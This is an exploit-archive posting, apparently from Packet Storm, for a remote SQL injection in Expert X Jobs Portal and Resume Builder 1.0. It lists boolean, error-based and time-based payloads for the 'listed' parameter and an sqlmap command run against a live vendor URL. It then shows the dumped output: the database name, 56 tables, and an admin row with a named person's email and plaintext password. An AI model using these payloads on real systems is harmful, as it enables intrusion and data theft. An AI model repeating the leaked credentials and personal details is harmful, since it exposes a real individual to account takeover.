exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection
Posted Jul 26, 2022
Authored by CraCkEr

Expert X Jobs Portal and Resume Builder version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 376564ceda2e198de8dceb8ed5116a678ef9962cb5cead849c271870ad95168e

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : wvidesk.com │ │ │
│ Vendor : WVIDesk │ │ │
│ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │
│ Resume Builder v. 1.0 │ │ events and scholarships. │
│ Vuln Type: Remote SQL Injection │ │ │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'listed' is vulnerable.

---
Parameter: listed (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD

Type: time-based blind
Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---

[+] Starting the Attack

sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'


fetching tables for database: 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
[56 tables]
+---------------------+
| adminMenu |
| applyajob |
| candidatefeedback |
| candidatelogin |
| candidateview |
| clickcount |
| controlall |
| controlcategory |
| coursecategory |
| courseinstitute |
| coursevisitsite |
| eventcategory |
| eventtype |
| jobagentcountry |
| jobalert |
| jobcategory |
| jobcity |
| jobcompanyinfo |
| jobcontinent |
| jobcountry |
| jobeducationsubject |
| jobindustry |
| jobmessage |
| jobpostingprice |
| jobquestion |
| jobseniority |
| jobuniversity |
| jobusermaster |
| jobusertype |
| jobvisitsite |
| mainmenu |
| postacourse |
| postaevent |
| postajob |
| postascholarship |
| resumeaward |
| resumecarsum |
| resumecertificate |
| resumecomment |
| resumeeducation |
| resumelanguage |
| resumeprofessional |
| resumepublication |
| resumeresearch |
| resumeskill |
| resumesumexp |
| resumetraining |
| resumework |
| scholarshipperiod |
| seeker_profile |
| seekers_admin |
| siteAdmin |
| siteadminuser |
| tbl_countries |
| tblpage |
| userrole |
+---------------------+

fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| aflag | varchar(2) |
| desig | varchar(200) |
| enet | varchar(450) |
| fullname | varchar(450) |
| id | int(10) |
| pw | varchar(25) |
| role | int(10) |
| users | varchar(200) |
+----------+--------------+


fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'


Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]
+-------+------------+--------------------+------------------------+----+------+------+-------+
| aflag | desig | enet | fullname | id | pw | role | users |
+-------+------------+--------------------+------------------------+----+------+------+-------+
| Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |
+-------+------------+--------------------+------------------------+----+------+------+-------+


[-] Done
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close